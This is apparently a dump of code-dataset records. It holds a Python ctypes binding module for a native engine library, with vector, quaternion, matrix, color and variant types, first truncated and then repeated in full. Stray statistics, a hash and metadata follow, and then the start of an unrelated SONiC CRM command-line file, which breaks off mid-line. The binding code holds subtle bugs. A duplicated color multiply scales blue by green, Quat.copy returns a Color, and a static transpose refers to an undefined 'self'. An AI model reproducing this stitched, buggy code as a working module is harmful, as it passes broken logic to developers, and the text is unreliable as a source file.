self.z*self.z) length = property(get_length) @staticmethod def dot(a, b): return a.x*b.x + a.y*b.y + a.z*b.z @staticmethod def normalize(v): scale = 1.0 / v.length return Vec3(v.x*scale, v.y*scale, v.z*scale) @staticmethod def cross(v1, v2): return Vec3(v1.y*v2.z - v1.z*v2.y, v1.z*v2.x - v1.x*v2.z, v1.x*v2.y - v1.y*v2.x) @staticmethod def lerp(v1, v2, t): return Vec3(\ v1.x + t*(v2.x - v1.x), v1.y + t*(v2.y - v1.y), v1.z + t*(v2.z - v1.z)) def __str__(self): return 'Vec3: %f, %f, %f' % (self.x, self.y, self.z) class Vec2(Structure): _fields_ = [('x', c_float), ('y', c_float)] def __init__(self, _x = 0, _y = 0): self.x = _x self.y = _y def copy(self): return Vec2(self.x, self.y) def __add__(a, b): return Vec2(a.x + b.x, a.y + b.y) def __sub__(a, b): return Vec2(a.x - b.x, a.y - b.y) def __mul__(a, b): return Vec2(a.x*b, a.y*b) def __div__(a, b): return Vec2(a.x/b, a.y/b) def __str__(self): return 'Vec2: %f, %f' % (self.x, self.y) class Vec2i(Structure): _fields_ = [('x', c_int), ('y', c_int)] def __init__(self, _x = 0, _y = 0): self.x = int(_x) self.y = int(_y) def copy(self): return Vec2i(self.x, self.y) def __add__(a, b): return Vec2(a.x + b.x, a.y + b.y) def __sub__(a, b): return Vec2(a.x - b.x, a.y - b.y) def __mul__(a, b): return Vec2(a.x*b, a.y*b) def __str__(self): return 'Vec2i: %d, %d' % (self.x, self.y) class Vec4(Structure): _fields_ = [('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float)] def __init__(self, _x = 0, _y = 0, _z = 0, _w = 1): self.x = _x self.y = _y self.z = _z self.w = 1 def copy(self): return Vec4(self.x, self.y, self.z, self.w) def __add__(a, b): return Vec4(a.x + b.x, a.y + b.y, a.z + b.z, a.w + b.w) def __sub__(a, b): return Vec4(a.x - b.x, a.y - b.y, a.z - b.z, a.w - b.w) def __mul__(a, b): return Vec4(a.x*b, a.y*b, a.z*b, a.w*b) def __div__(a, b): return Vec4(a.x/b, a.y/b, a.z/b, a.w/b) def __str__(self): return 'Vec4: %f, %f, %f, %f' % (self.x, self.y, self.z, self.w) class Color(Structure): _fields_ = [('r', c_float), ('g', c_float), ('b', c_float), ('a', c_float)] def __init__(self, _r = 0, _g = 0, _b = 0, _a = 1): self.r = _r self.g = _g self.b = _b self.a = _a def copy(self): return Color(self.r, self.g, self.b, self.a) def __mul__(a, b): return Color(a.r*b, a.g*b, a.g*b, a.a) def __mul__(a, b): return Color(a.r*b.r, a.g*b.g, a.g*b.b, min(a.a, b.a)) def __add__(a, b): return Color(a.r+b.r, a.g+b.g, a.b+b.b, max(a.a, b.a)) @staticmethod def lerp(c1, c2, t): tinv = 1 - t return Color( c1.r*t + c2.r*tinv, c1.g*t + c2.g*tinv, c1.b*t + c2.b*tinv, c1.a*t + c2.a*tinv) class Quat(Structure): _fields_ = [('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float)] def __init__(self, _x = 0, _y = 0, _z = 0, _w = 1): self.x = _x self.y = _y self.z = _z self.w = _w def copy(self): return Color(self.x, self.y, self.z, self.w) def __mul__(q1, q2): return Quat(\ q1.w*q2.x + q1.x*q2.w + q1.z*q2.y - q1.y*q2.z, q1.w*q2.y + q1.y*q2.w + q1.x*q2.z - q1.z*q2.x, q1.w*q2.z + q1.z*q2.w + q1.y*q2.x - q1.x*q2.y, q1.w*q2.w - q1.x*q2.x - q1.y*q2.y - q1.z*q2.z) def __eq__(q1, q2): if q1.x == q2.x and q1.y == q2.y and q1.z == q2.z and q1.w == q2.w: return True else: return False def from_axis(self, axis, angle): _API.quat_fromaxis(byref(self), byref(axis), c_float(angle)) def from_euler(self, pitch, yaw, roll): _API.quat_fromeuler(byref(self), c_float(pitch), c_float(yaw), c_float(roll)) def from_matrix3(self, mat): _API.quat_frommat3(byref(self), byref(mat)) @staticmethod def inverse(q): return Quat(-q.x, -q.y, -q.z, q.w) @staticmethod def slerp(q1, q2, t): q = Quat() _API.quat_slerp(byref(q), byref(q1), byref(q2), c_float(t)) return q def __str__(self): return 'Quat: %f %f %f %f' % (self.x, self.y, self.z, self.w) class Matrix3(Structure): _fields_ = [\ ('m11', c_float), ('m12', c_float), ('m13', c_float), ('m14', c_float), ('m21', c_float), ('m22', c_float), ('m23', c_float), ('m24', c_float), ('m31', c_float), ('m32', c_float), ('m33', c_float), ('m34', c_float), ('m41', c_float), ('m42', c_float), ('m43', c_float), ('m44', c_float)] def __init__(self, _m11 = 1, _m12 = 0, _m13 = 0, _m21 = 0, _m22 = 1, _m23 = 0, _m31 = 0, _m32 = 0, _m33 = 1, _m41 = 0, _m42 = 0, _m43 = 0): self.m11 = _m11 self.m12 = _m12 self.m13 = _m13 self.m21 = _m21 self.m22 = _m22 self.m23 = _m23 self.m31 = _m31 self.m32 = _m32 self.m33 = _m33 self.m41 = _m41 self.m42 = _m42 self.m43 = _m43 def copy(self): return Matrix3(\ self.m11, self.m12, self.m13, self.m21, self.m22, self.m23, self.m31, self.m32, self.m33, self.m41, self.m42, self.m43) def __mul__(a, b): if type(b) is float or type(b) is int: return Matrix3(\ a.m11*b, a.m21*b, a.m31*b, a.m41*b, a.m12*b, a.m22*b, a.m32*b, a.m42*b, a.m13*b, a.m23*b, a.m33*b, a.m43*b) else: return Matrix3(\ a.m11*b.m11 + a.m12*b.m21 + a.m13*b.m31, a.m11*b.m12 + a.m12*b.m22 + a.m13*b.m32, a.m11*b.m13 + a.m12*b.m23 + a.m13*b.m33, a.m21*b.m11 + a.m22*b.m21 + a.m23*b.m31, a.m21*b.m12 + a.m22*b.m22 + a.m23*b.m32, a.m21*b.m13 + a.m22*b.m23 + a.m23*b.m33, a.m31*b.m11 + a.m32*b.m21 + a.m33*b.m31, a.m31*b.m12 + a.m32*b.m22 + a.m33*b.m32, a.m31*b.m13 + a.m32*b.m23 + a.m33*b.m33, a.m41*b.m11 + a.m42*b.m21 + a.m43*b.m31 + b.m41, a.m41*b.m12 + a.m42*b.m22 + a.m43*b.m32 + b.m42, a.m41*b.m13 + a.m42*b.m23 + a.m43*b.m33 + b.m43); def translate(self, x, y, z): self.m41 = x self.m42 = y self.m43 = z def translate(self, v): self.m41 = v.x self.m42 = v.y self.m43 = v.z def rotate_euler(self, pitch, yaw, roll): _API.mat3_set_roteuler(byref(self), c_float(pitch), c_float(yaw), c_float(roll)) def rotate_quat(self, q): _API.mat3_set_rotquat(byref(self), byref(q)) def rotate_axis(self, axis, angle): _API.mat3_set_rotaxis(byref(self), byref(axis), c_float(angle)) def scale(self, sx, sy, sz): self.m11 = sx self.m22 = sy self.m33 = sz def __get_determinant(self): return _API.mat3_det(byref(self)) determinant = property(__get_determinant) def __get_translation(self): return Vec3(self.m41, self.m42, self.m43) translation = property(__get_translation) @staticmethod def transpose(m): return Matrix3(\ self.m11, self.m21, self.m31, self.m12, self.m22, self.m32, self.m13, self.m23, self.m33, self.m14, self.m24, self.m34) @staticmethod def invert(m): r = Matrix3() _API.mat3_inv(byref(r), byref(m)) return r class Matrix4(Structure): _fields_ = [\ ('m11', c_float), ('m12', c_float), ('m13', c_float), ('m14', c_float), ('m21', c_float), ('m22', c_float), ('m23', c_float), ('m24', c_float), ('m31', c_float), ('m32', c_float), ('m33', c_float), ('m34', c_float), ('m41', c_float), ('m42', c_float), ('m43', c_float), ('m44', c_float)] def __init__(self, _m11 = 1, _m12 = 0, _m13 = 0, _m14 = 0, _m21 = 0, _m22 = 1, _m23 = 0, _m24 = 0, _m31 = 0, _m32 = 0, _m33 = 1, _m34 = 0, _m41 = 0, _m42 = 0, _m43 = 0, _m44 = 1): self.m11 = _m11 self.m12 = _m12 self.m13 = _m13 self.m14 = _m14 self.m21 = _m21 self.m22 = _m22 self.m23 = _m23 self.m24 = _m24 self.m31 = _m31 self.m32 = _m32 self.m33 = _m33 self.m34 = _m34 self.m41 = _m41 self.m42 = _m42 self.m43 = _m43 self.m44 = _m44 def copy(self): return Matrix4(\ self.m11, self.m12, self.m13, self.m14, self.m21, self.m22, self.m23, self.m24, self.m31, self.m32, self.m33, self.m34, self.m41, self.m42, self.m43, self.m44) class Math: PI = 3.14159265 @staticmethod def to_rad(x): return x*Math.PI/180.0 @staticmethod def to_deg(x): return 180.0*x/Math.PI class FileIO: @staticmethod def add_virtual_path(path, monitor=False): path = os.path.abspath(os.path.expanduser(path)) if not _API.fio_addvdir(to_cstr(path), c_int(monitor)): raise Exception(Errors.last_error()) class Variant(Structure): class VarType: BOOL = 1 INT = 2 UINT = 3 FLOAT = 4 FLOAT2 = 5 FLOAT3 = 6 FLOAT4 = 7 INT2 = 8 INT3 = 9 INT4 = 10 STRING = 11 class _Value(Union): _fields_ = [\ ('b', c_int), ('i', c_int), ('ui', c_uint), ('f', c_float), ('fv', c_float*4), ('iv', c_int*4), ('s', c_char*16)] _fields_ = [('type', c_uint), ('value', _Value)] def set_value(self, v): if type(v) is bool: self.type = Variant.VarType.BOOL self.value.b = int(v) elif type(v) is int: self.type = Variant.VarType.INT self.value.i = v elif type(v) is float: self.type = Variant.VarType.FLOAT self.value.f = v elif type(v) is Vec2: self.type = Variant.VarType.FLOAT2 self.value.fv[0] = v.x self.value.fv[1] = v.y elif type(v) is Vec3: self.type = Variant.VarType.FLOAT3 self.value.fv[0] = v.x self.value.fv[1] = v.y self.value.fv[2] = v.z elif type(v) is Vec2i: self.type = Variant.VarType.INT2 self.value.iv[0] = v.x self.value.iv[1] = v.y elif (type(v) is Color) or (type(v) is Vec4): self.type = Variant.VarType.FLOAT4 self.value.fv[0] = v.x self.value.fv[1] = v.y self.value.fv[2] = v.z self.value.fv[3] = v.w elif type(v) is str: self.type = Variant.VarType.STRING self.value.s = to_cstr(v) else: raise Exception('unknown type') def get_value(self): if self.type == Variant.VarType.BOOL: return self.value.b elif self.type == Variant.VarType.INT: return self.value.i elif self.type == Variant.VarType.FLOAT: return self.value.f elif self.type == Variant.VarType.FLOAT2: return Vec2(self.value.fv[0], self.value.fv[1]) elif self.type == Variant.VarType.FLOAT3: return Vec3(self.value.fv[0], self.value.fv[1], self.value.fv[2]) elif self.type == Variant.VarType.INT2: return Vec2i(self.value.iv[0], self.value.iv[1]) elif self.type == Variant.VarType.FLOAT4: return Vec4(self.value.fv[0], self.value.fv[1], self.value.fv[2], self.value.fv[3]) elif self.type == Variant.VarType.STRING: return self.value.s else: raise Exception('unknown type') _API.init(debug = ('--debug' in sys.argv))
30.311111
95
0.54116
import sys, os, inspect from ctypes import * import math MY_DIR = os.path.dirname(os.path.abspath(inspect.getframeinfo(inspect.currentframe())[0])) HELPER_DIR = os.path.abspath(os.path.join(MY_DIR, '..', 'helpers')) sys.path.append(HELPER_DIR) import dhlog class _API: is_init = False @staticmethod def init(debug=False): if _API.is_init: return postfix = '' if debug: postfix = '-dbg' if sys.platform == 'win32': shlib = 'dhcore' + postfix + '.dll' elif sys.platform == 'linux': shlib = 'libdhcore' + postfix + '.so' try: dhcorelib = cdll.LoadLibrary(shlib) except: dhlog.Log.warn(str(sys.exc_info()[1])) dhlog.Log.fatal('could not load dynamic library %s' % shlib) sys.exit(-1) dhlog.Log.msgline('module "%s" loaded' % shlib, dhlog.TERM_GREEN) _API.core_init = dhcorelib.core_init _API.core_init.restype = c_int _API.core_init.argtypes = [c_uint] _API.core_release = dhcorelib.core_release _API.core_release.argtypes = [c_int] _API.err_getstring = dhcorelib.err_getstring _API.err_getstring.restype = c_char_p _API.log_outputconsole = dhcorelib.log_outputconsole _API.log_outputconsole.restype = c_uint _API.log_outputconsole.argtypes = [c_int] _API.log_outputfile = dhcorelib.log_outputfile _API.log_outputfile.restype = c_uint _API.log_outputfile.argtypes = [c_int, c_char_p] _API.log_isfile = dhcorelib.log_isfile _API.log_isfile.restype = c_int _API.log_isconsole = dhcorelib.log_isconsole _API.log_isconsole.restype = c_int _API.log_print = dhcorelib.log_print _API.log_print.argtypes = [c_uint, c_char_p] _API.fio_addvdir = dhcorelib.fio_addvdir _API.fio_addvdir.restype = c_int _API.fio_addvdir.argtypes = [c_char_p, c_int] _API.mat3_muls = dhcorelib.mat3_muls _API.mat3_muls.restype = POINTER(Matrix3) _API.mat3_muls.argtypes = [POINTER(Matrix3), POINTER(Matrix3), c_float] _API.mat3_set_roteuler = dhcorelib.mat3_set_roteuler _API.mat3_set_roteuler.restype = POINTER(Matrix3) _API.mat3_set_roteuler.argtypes = [POINTER(Matrix3), c_float, c_float, c_float] _API.quat_slerp = dhcorelib.quat_slerp _API.quat_slerp.restype = POINTER(Quat) _API.quat_slerp.argtypes = [POINTER(Quat), POINTER(Quat), POINTER(Quat), c_float] _API.quat_fromaxis = dhcorelib.quat_fromaxis _API.quat_fromaxis.restype = POINTER(Quat) _API.quat_fromaxis.argtypes = [POINTER(Quat), POINTER(Vec3), c_float] _API.quat_fromeuler = dhcorelib.quat_fromeuler _API.quat_fromeuler.restype = POINTER(Quat) _API.quat_fromeuler.argtypes = [POINTER(Quat), c_float, c_float, c_float] _API.quat_frommat3 = dhcorelib.quat_frommat3 _API.quat_frommat3.restype = POINTER(Quat) _API.quat_frommat3.argtypes = [POINTER(Quat), POINTER(Matrix3)] _API.mat3_inv = dhcorelib.mat3_inv _API.mat3_inv.restype = POINTER(Matrix3) _API.mat3_inv.argtypes = [POINTER(Matrix3), POINTER(Matrix3)] _API.mat3_set_rotaxis = dhcorelib.mat3_set_rotaxis _API.mat3_set_rotaxis.restype = POINTER(Matrix3) _API.mat3_set_rotaxis.argtypes = [POINTER(Matrix3), POINTER(Vec3), c_float] _API.mat3_set_roteuler = dhcorelib.mat3_set_roteuler _API.mat3_set_roteuler.restype = POINTER(Matrix3) _API.mat3_set_roteuler.argtypes = [POINTER(Matrix3), c_float, c_float, c_float] _API.mat3_set_rotquat = dhcorelib.mat3_set_rotquat _API.mat3_set_rotquat.restype = POINTER(Matrix3) _API.mat3_set_rotquat.argtypes = [POINTER(Matrix3), POINTER(Quat)] _API.mat3_inv = dhcorelib.mat3_inv _API.mat3_inv.restype = POINTER(Matrix3) _API.mat3_inv.argtypes = [POINTER(Matrix3), POINTER(Matrix3)] _API.mat3_det = dhcorelib.mat3_det _API.mat3_det.restype = c_float _API.mat3_det.argtypes = [POINTER(Matrix3)] _API.is_init = True def IS_FAIL(r): if r <= 0: return True else: return False INVALID_HANDLE = 0xffffffffffffffff INVALID_INDEX = 0xffffffff def to_cstr(s): return create_string_buffer(s.encode('ascii')) class Errors: @staticmethod def last_error(): r = _API.err_getstring() return r.decode() class Log: class LogType: TEXT = 0 ERROR = 1 WARNING = 3, INFO = 3, LOAD = 4 @staticmethod def set_console_output(enable): _API.log_outputconsole(c_int(enable)) @staticmethod def set_file_output(logfile): if logfile != None: _API.log_outputfile(c_int(True), create_string_buffer(logfile.encode('ascii'))) else: _API.log_outputfile(c_int(False), None) @staticmethod def msg(log_type, msg): _API.log_print(c_uint(log_type), create_string_buffer(msg.encode('ascii'))) class Core: class InitFlags(): TRACE_MEM = (1<<0) CRASH_DUMP = (1<<1) LOGGER = (1<<2) ERRORS = (1<<3) JSON = (1<<4) FILE_IO = (1<<5) TIMER = (1<<6) ALL = 0xffffffff @staticmethod def init(flags = InitFlags.ALL): if IS_FAIL(_API.core_init(c_uint(flags))): raise Exception(_API.err_getstring()) @staticmethod def release(report_leaks = True): _API.core_release(c_int(report_leaks)) class Vec3(Structure): _fields_ = [('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float)] def __init__(self, _x = 0, _y = 0, _z = 0, _w = 1): self.x = _x self.y = _y self.z = _z self.w = 1 def __add__(a, b): return Vec3(a.x + b.x, a.y + b.y, a.z + b.z) def __mul__(a, b): if type(b) is float or type(b) is int: return Vec3(a.x*b, a.y*b, a.z*b) elif type(b) is Matrix3: return Vec3(\ a.x*b.m11 + a.y*b.m21 + a.z*b.m31 + b.m41, a.x*b.m12 + a.y*b.m22 + a.z*b.m32 + b.m42, a.x*b.m13 + a.y*b.m23 + a.z*b.m33 + b.m43); def copy(self): return Vec3(self.x, self.y, self.z) def __div__(a, b): return Vec3(a.x/b, a.y/b, a.z/b) def __eq__(a, b): if a.x == b.x and a.y == b.y and a.z == b.z: return True else: return False def __sub__(a, b): return Vec3(a.x - b.x, a.y - b.y, a.z - b.z) def get_length(self): return math.sqrt(self.x*self.x + self.y*self.y + self.z*self.z) length = property(get_length) @staticmethod def dot(a, b): return a.x*b.x + a.y*b.y + a.z*b.z @staticmethod def normalize(v): scale = 1.0 / v.length return Vec3(v.x*scale, v.y*scale, v.z*scale) @staticmethod def cross(v1, v2): return Vec3(v1.y*v2.z - v1.z*v2.y, v1.z*v2.x - v1.x*v2.z, v1.x*v2.y - v1.y*v2.x) @staticmethod def lerp(v1, v2, t): return Vec3(\ v1.x + t*(v2.x - v1.x), v1.y + t*(v2.y - v1.y), v1.z + t*(v2.z - v1.z)) def __str__(self): return 'Vec3: %f, %f, %f' % (self.x, self.y, self.z) class Vec2(Structure): _fields_ = [('x', c_float), ('y', c_float)] def __init__(self, _x = 0, _y = 0): self.x = _x self.y = _y def copy(self): return Vec2(self.x, self.y) def __add__(a, b): return Vec2(a.x + b.x, a.y + b.y) def __sub__(a, b): return Vec2(a.x - b.x, a.y - b.y) def __mul__(a, b): return Vec2(a.x*b, a.y*b) def __div__(a, b): return Vec2(a.x/b, a.y/b) def __str__(self): return 'Vec2: %f, %f' % (self.x, self.y) class Vec2i(Structure): _fields_ = [('x', c_int), ('y', c_int)] def __init__(self, _x = 0, _y = 0): self.x = int(_x) self.y = int(_y) def copy(self): return Vec2i(self.x, self.y) def __add__(a, b): return Vec2(a.x + b.x, a.y + b.y) def __sub__(a, b): return Vec2(a.x - b.x, a.y - b.y) def __mul__(a, b): return Vec2(a.x*b, a.y*b) def __str__(self): return 'Vec2i: %d, %d' % (self.x, self.y) class Vec4(Structure): _fields_ = [('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float)] def __init__(self, _x = 0, _y = 0, _z = 0, _w = 1): self.x = _x self.y = _y self.z = _z self.w = 1 def copy(self): return Vec4(self.x, self.y, self.z, self.w) def __add__(a, b): return Vec4(a.x + b.x, a.y + b.y, a.z + b.z, a.w + b.w) def __sub__(a, b): return Vec4(a.x - b.x, a.y - b.y, a.z - b.z, a.w - b.w) def __mul__(a, b): return Vec4(a.x*b, a.y*b, a.z*b, a.w*b) def __div__(a, b): return Vec4(a.x/b, a.y/b, a.z/b, a.w/b) def __str__(self): return 'Vec4: %f, %f, %f, %f' % (self.x, self.y, self.z, self.w) class Color(Structure): _fields_ = [('r', c_float), ('g', c_float), ('b', c_float), ('a', c_float)] def __init__(self, _r = 0, _g = 0, _b = 0, _a = 1): self.r = _r self.g = _g self.b = _b self.a = _a def copy(self): return Color(self.r, self.g, self.b, self.a) def __mul__(a, b): return Color(a.r*b, a.g*b, a.g*b, a.a) def __mul__(a, b): return Color(a.r*b.r, a.g*b.g, a.g*b.b, min(a.a, b.a)) def __add__(a, b): return Color(a.r+b.r, a.g+b.g, a.b+b.b, max(a.a, b.a)) @staticmethod def lerp(c1, c2, t): tinv = 1 - t return Color( c1.r*t + c2.r*tinv, c1.g*t + c2.g*tinv, c1.b*t + c2.b*tinv, c1.a*t + c2.a*tinv) class Quat(Structure): _fields_ = [('x', c_float), ('y', c_float), ('z', c_float), ('w', c_float)] def __init__(self, _x = 0, _y = 0, _z = 0, _w = 1): self.x = _x self.y = _y self.z = _z self.w = _w def copy(self): return Color(self.x, self.y, self.z, self.w) def __mul__(q1, q2): return Quat(\ q1.w*q2.x + q1.x*q2.w + q1.z*q2.y - q1.y*q2.z, q1.w*q2.y + q1.y*q2.w + q1.x*q2.z - q1.z*q2.x, q1.w*q2.z + q1.z*q2.w + q1.y*q2.x - q1.x*q2.y, q1.w*q2.w - q1.x*q2.x - q1.y*q2.y - q1.z*q2.z) def __eq__(q1, q2): if q1.x == q2.x and q1.y == q2.y and q1.z == q2.z and q1.w == q2.w: return True else: return False def from_axis(self, axis, angle): _API.quat_fromaxis(byref(self), byref(axis), c_float(angle)) def from_euler(self, pitch, yaw, roll): _API.quat_fromeuler(byref(self), c_float(pitch), c_float(yaw), c_float(roll)) def from_matrix3(self, mat): _API.quat_frommat3(byref(self), byref(mat)) @staticmethod def inverse(q): return Quat(-q.x, -q.y, -q.z, q.w) @staticmethod def slerp(q1, q2, t): q = Quat() _API.quat_slerp(byref(q), byref(q1), byref(q2), c_float(t)) return q def __str__(self): return 'Quat: %f %f %f %f' % (self.x, self.y, self.z, self.w) class Matrix3(Structure): _fields_ = [\ ('m11', c_float), ('m12', c_float), ('m13', c_float), ('m14', c_float), ('m21', c_float), ('m22', c_float), ('m23', c_float), ('m24', c_float), ('m31', c_float), ('m32', c_float), ('m33', c_float), ('m34', c_float), ('m41', c_float), ('m42', c_float), ('m43', c_float), ('m44', c_float)] def __init__(self, _m11 = 1, _m12 = 0, _m13 = 0, _m21 = 0, _m22 = 1, _m23 = 0, _m31 = 0, _m32 = 0, _m33 = 1, _m41 = 0, _m42 = 0, _m43 = 0): self.m11 = _m11 self.m12 = _m12 self.m13 = _m13 self.m21 = _m21 self.m22 = _m22 self.m23 = _m23 self.m31 = _m31 self.m32 = _m32 self.m33 = _m33 self.m41 = _m41 self.m42 = _m42 self.m43 = _m43 def copy(self): return Matrix3(\ self.m11, self.m12, self.m13, self.m21, self.m22, self.m23, self.m31, self.m32, self.m33, self.m41, self.m42, self.m43) def __mul__(a, b): if type(b) is float or type(b) is int: return Matrix3(\ a.m11*b, a.m21*b, a.m31*b, a.m41*b, a.m12*b, a.m22*b, a.m32*b, a.m42*b, a.m13*b, a.m23*b, a.m33*b, a.m43*b) else: return Matrix3(\ a.m11*b.m11 + a.m12*b.m21 + a.m13*b.m31, a.m11*b.m12 + a.m12*b.m22 + a.m13*b.m32, a.m11*b.m13 + a.m12*b.m23 + a.m13*b.m33, a.m21*b.m11 + a.m22*b.m21 + a.m23*b.m31, a.m21*b.m12 + a.m22*b.m22 + a.m23*b.m32, a.m21*b.m13 + a.m22*b.m23 + a.m23*b.m33, a.m31*b.m11 + a.m32*b.m21 + a.m33*b.m31, a.m31*b.m12 + a.m32*b.m22 + a.m33*b.m32, a.m31*b.m13 + a.m32*b.m23 + a.m33*b.m33, a.m41*b.m11 + a.m42*b.m21 + a.m43*b.m31 + b.m41, a.m41*b.m12 + a.m42*b.m22 + a.m43*b.m32 + b.m42, a.m41*b.m13 + a.m42*b.m23 + a.m43*b.m33 + b.m43); def translate(self, x, y, z): self.m41 = x self.m42 = y self.m43 = z def translate(self, v): self.m41 = v.x self.m42 = v.y self.m43 = v.z def rotate_euler(self, pitch, yaw, roll): _API.mat3_set_roteuler(byref(self), c_float(pitch), c_float(yaw), c_float(roll)) def rotate_quat(self, q): _API.mat3_set_rotquat(byref(self), byref(q)) def rotate_axis(self, axis, angle): _API.mat3_set_rotaxis(byref(self), byref(axis), c_float(angle)) def scale(self, sx, sy, sz): self.m11 = sx self.m22 = sy self.m33 = sz def __get_determinant(self): return _API.mat3_det(byref(self)) determinant = property(__get_determinant) def __get_translation(self): return Vec3(self.m41, self.m42, self.m43) translation = property(__get_translation) @staticmethod def transpose(m): return Matrix3(\ self.m11, self.m21, self.m31, self.m12, self.m22, self.m32, self.m13, self.m23, self.m33, self.m14, self.m24, self.m34) @staticmethod def invert(m): r = Matrix3() _API.mat3_inv(byref(r), byref(m)) return r class Matrix4(Structure): _fields_ = [\ ('m11', c_float), ('m12', c_float), ('m13', c_float), ('m14', c_float), ('m21', c_float), ('m22', c_float), ('m23', c_float), ('m24', c_float), ('m31', c_float), ('m32', c_float), ('m33', c_float), ('m34', c_float), ('m41', c_float), ('m42', c_float), ('m43', c_float), ('m44', c_float)] def __init__(self, _m11 = 1, _m12 = 0, _m13 = 0, _m14 = 0, _m21 = 0, _m22 = 1, _m23 = 0, _m24 = 0, _m31 = 0, _m32 = 0, _m33 = 1, _m34 = 0, _m41 = 0, _m42 = 0, _m43 = 0, _m44 = 1): self.m11 = _m11 self.m12 = _m12 self.m13 = _m13 self.m14 = _m14 self.m21 = _m21 self.m22 = _m22 self.m23 = _m23 self.m24 = _m24 self.m31 = _m31 self.m32 = _m32 self.m33 = _m33 self.m34 = _m34 self.m41 = _m41 self.m42 = _m42 self.m43 = _m43 self.m44 = _m44 def copy(self): return Matrix4(\ self.m11, self.m12, self.m13, self.m14, self.m21, self.m22, self.m23, self.m24, self.m31, self.m32, self.m33, self.m34, self.m41, self.m42, self.m43, self.m44) class Math: PI = 3.14159265 @staticmethod def to_rad(x): return x*Math.PI/180.0 @staticmethod def to_deg(x): return 180.0*x/Math.PI class FileIO: @staticmethod def add_virtual_path(path, monitor=False): path = os.path.abspath(os.path.expanduser(path)) if not _API.fio_addvdir(to_cstr(path), c_int(monitor)): raise Exception(Errors.last_error()) class Variant(Structure): class VarType: BOOL = 1 INT = 2 UINT = 3 FLOAT = 4 FLOAT2 = 5 FLOAT3 = 6 FLOAT4 = 7 INT2 = 8 INT3 = 9 INT4 = 10 STRING = 11 class _Value(Union): _fields_ = [\ ('b', c_int), ('i', c_int), ('ui', c_uint), ('f', c_float), ('fv', c_float*4), ('iv', c_int*4), ('s', c_char*16)] _fields_ = [('type', c_uint), ('value', _Value)] def set_value(self, v): if type(v) is bool: self.type = Variant.VarType.BOOL self.value.b = int(v) elif type(v) is int: self.type = Variant.VarType.INT self.value.i = v elif type(v) is float: self.type = Variant.VarType.FLOAT self.value.f = v elif type(v) is Vec2: self.type = Variant.VarType.FLOAT2 self.value.fv[0] = v.x self.value.fv[1] = v.y elif type(v) is Vec3: self.type = Variant.VarType.FLOAT3 self.value.fv[0] = v.x self.value.fv[1] = v.y self.value.fv[2] = v.z elif type(v) is Vec2i: self.type = Variant.VarType.INT2 self.value.iv[0] = v.x self.value.iv[1] = v.y elif (type(v) is Color) or (type(v) is Vec4): self.type = Variant.VarType.FLOAT4 self.value.fv[0] = v.x self.value.fv[1] = v.y self.value.fv[2] = v.z self.value.fv[3] = v.w elif type(v) is str: self.type = Variant.VarType.STRING self.value.s = to_cstr(v) else: raise Exception('unknown type') def get_value(self): if self.type == Variant.VarType.BOOL: return self.value.b elif self.type == Variant.VarType.INT: return self.value.i elif self.type == Variant.VarType.FLOAT: return self.value.f elif self.type == Variant.VarType.FLOAT2: return Vec2(self.value.fv[0], self.value.fv[1]) elif self.type == Variant.VarType.FLOAT3: return Vec3(self.value.fv[0], self.value.fv[1], self.value.fv[2]) elif self.type == Variant.VarType.INT2: return Vec2i(self.value.iv[0], self.value.iv[1]) elif self.type == Variant.VarType.FLOAT4: return Vec4(self.value.fv[0], self.value.fv[1], self.value.fv[2], self.value.fv[3]) elif self.type == Variant.VarType.STRING: return self.value.s else: raise Exception('unknown type') _API.init(debug = ('--debug' in sys.argv))
true
true
f728f87dd991e699b34d62bb2c156120a76fee44
21,464
py
Python
crm/main.py
PJHsieh/sonic-utilities
4e132c1c86c515076815a64cf22aaf8e0101de84
[ "Apache-2.0" ]
1
2022-01-29T01:31:49.000Z
2022-01-29T01:31:49.000Z
crm/main.py
PJHsieh/sonic-utilities
4e132c1c86c515076815a64cf22aaf8e0101de84
[ "Apache-2.0" ]
9
2019-09-25T05:54:34.000Z
2022-03-30T09:28:26.000Z
crm/main.py
PJHsieh/sonic-utilities
4e132c1c86c515076815a64cf22aaf8e0101de84
[ "Apache-2.0" ]
1
2021-08-30T06:47:30.000Z
2021-08-30T06:47:30.000Z
#!/usr/bin/env python3 import click from swsscommon.swsscommon import ConfigDBConnector from tabulate import tabulate from sonic_py_common import multi_asic from utilities_common.general import load_db_config from utilities_common import multi_asic as multi_asic_util class Crm: def __init__(self, db=None): self.cli_mode = None self.addr_family = None self.res_type = None self.db = None self.cfgdb = db self.multi_asic = multi_asic_util.MultiAsic() @multi_asic_util.run_on_multi_asic def config(self, attr, val): """ CRM handler for 'config' CLI commands. """ if self.cfgdb: self.config_db = self.cfgdb self.config_db.mod_entry("CRM", 'Config', {attr: val}) def show_summary(self): """ CRM Handler to display general information. """ configdb = self.cfgdb if configdb is None: # Get the namespace list namespaces = multi_asic.get_namespace_list() configdb = ConfigDBConnector(namespace=namespaces[0]) configdb.connect() crm_info = configdb.get_entry('CRM', 'Config') if crm_info: try: click.echo('\nPolling Interval: ' + crm_info['polling_interval'] + ' second(s)\n') except KeyError: click.echo('\nError! Could not get CRM configuration.\n') click.echo('\nError! Please configure polling interval.\n') else: click.echo('\nError! Could not get CRM configuration.\n') def show_thresholds(self, resource): """ CRM Handler to display thresholds information. """ configdb = self.cfgdb if configdb is None: # Get the namespace list namespaces = multi_asic.get_namespace_list() configdb = ConfigDBConnector(namespace=namespaces[0]) configdb.connect() crm_info = configdb.get_entry('CRM', 'Config') header = ("Resource Name", "Threshold Type", "Low Threshold", "High Threshold") data = [] if crm_info: if resource == 'all': for res in ["ipv4_route", "ipv6_route", "ipv4_nexthop", "ipv6_nexthop", "ipv4_neighbor", "ipv6_neighbor", "nexthop_group_member", "nexthop_group", "acl_table", "acl_group", "acl_entry", "acl_counter", "fdb_entry", "ipmc_entry", "snat_entry", "dnat_entry", "mpls_inseg", "mpls_nexthop","srv6_nexthop", "srv6_my_sid_entry"]: try: data.append([res, crm_info[res + "_threshold_type"], crm_info[res + "_low_threshold"], crm_info[res + "_high_threshold"]]) except KeyError: pass else: try: data.append([resource, crm_info[resource + "_threshold_type"], crm_info[resource + "_low_threshold"], crm_info[resource + "_high_threshold"]]) except KeyError: pass else: click.echo('\nError! Could not get CRM configuration.') click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() def get_resources(self, resource): """ CRM Handler to get resources information. """ crm_stats = 